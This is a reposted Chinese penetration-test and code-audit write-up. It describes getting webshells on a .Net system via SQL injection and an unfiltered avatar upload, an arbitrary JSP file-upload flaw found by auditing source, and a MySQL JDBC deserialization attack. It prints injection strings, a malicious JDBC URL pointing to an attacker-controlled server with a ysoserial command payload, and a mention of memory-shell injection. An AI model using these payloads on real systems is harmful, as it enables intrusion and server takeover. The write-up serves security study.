记一次渗透到审计

admin 2024年12月18日23:24:03评论33 views字数 1276阅读4分15秒阅读模式

文章首发在:先知社区

https://xz.aliyun.com/t/16746

前言

某次渗透项目中要求必须产出高危漏洞且要拿到服务器及数据库权限,难受的是测试的部分系统之前已测试过一轮且加固修复一波之后,再次丢出进行漏洞挖掘,头皮发麻。

某.Net系统getshell

.Net网站后台可关注头像上传/查询/提交的地方,这种可能有上传/SQL注入漏洞。

Aspx SQL 注入

UserID=1+or+1=1
UserID=1+or+1=2

SqlMap一把梭注入成功

记一次渗透到审计

记一次渗透到审计

Aspx 文件上传

头像上传处未做过滤,直接getshell

记一次渗透到审计

记一次渗透到审计

web.config获取多个数据库配置信息

记一次渗透到审计

记一次渗透到审计

审计

该系统之前已被挖掘过任意文件上传,后台基本没上传的点且都修复了,根据指纹特征,远方的队友给了一份源码,推测开发人员修复漏洞可能仅仅是修复某个页面或者某个点的漏洞而不是全局修复,尝试审计挖掘新的漏洞

任意文件上传

通过审计JSP文件,发现一处任意文件上传漏洞,前端获取uploadPath值

记一次渗透到审计

获取后缀未进行检查 extName = name.substring(name.lastIndexOf("."));
用时间戳+随机数字对文件进行重命名 name + (int)(Math.random()*90000+10000)
直接进行拼接 new File(savePath + name + extName)
最后写内容 item.write(file);

记一次渗透到审计

响应会返回上传成功重命名的文件名 ps:需注意的是没有返回具体的路径

response.getWriter().print((name.trim() + extName.trim()).trim());

记一次渗透到审计

前面提到uploadPath值很关键,决定了写入的shell文件存储的目录而且要有权限访问到,前面提到之前有被shell过,故直接将uploadPath值设为存在的访问路径,如/aaa/bbbb/直接构造上传的HTML文件。

记一次渗透到审计

经过测试成功上传,按照代码逻辑返回了上传的文件名

记一次渗透到审计

成功getshell

记一次渗透到审计

Mysql JDBC 反序列化漏洞

某jsp中找到一处数据库连接功能,URL/用户名/密码/可控,且lib包存在 Mysql,经过测试存在反序列化漏洞

记一次渗透到审计

直接分析.do对应的路由代码文件

记一次渗透到审计

不同数据库对应不同的type从而选择不同的数据库加载

记一次渗透到审计

记一次渗透到审计

记一次渗透到审计

记一次渗透到审计

访问对应的JSP文件完全可控,是一个数据库链接测试页面

记一次渗透到审计

服务端开启python server.py 由于目标系统存在cb、cc 可以利用cb2 弹个计算器(本地测试一下效果)

记一次渗透到审计

记一次渗透到审计

Mysql5.x 

url=jdbc:mysql://xx.xx.xx.xx:3307/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor
username=yso-CommonsBeanutils2-raw_cmd:calc.exe
password=123456

记一次渗透到审计

内存马注入

JMG 生成内存马 class文件

记一次渗透到审计

记一次渗透到审计

记一次渗透到审计

原文始发于微信公众号(亿人安全):记一次渗透到审计

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月18日23:24:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次渗透到审计https://cn-sec.com/archives/3525643.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息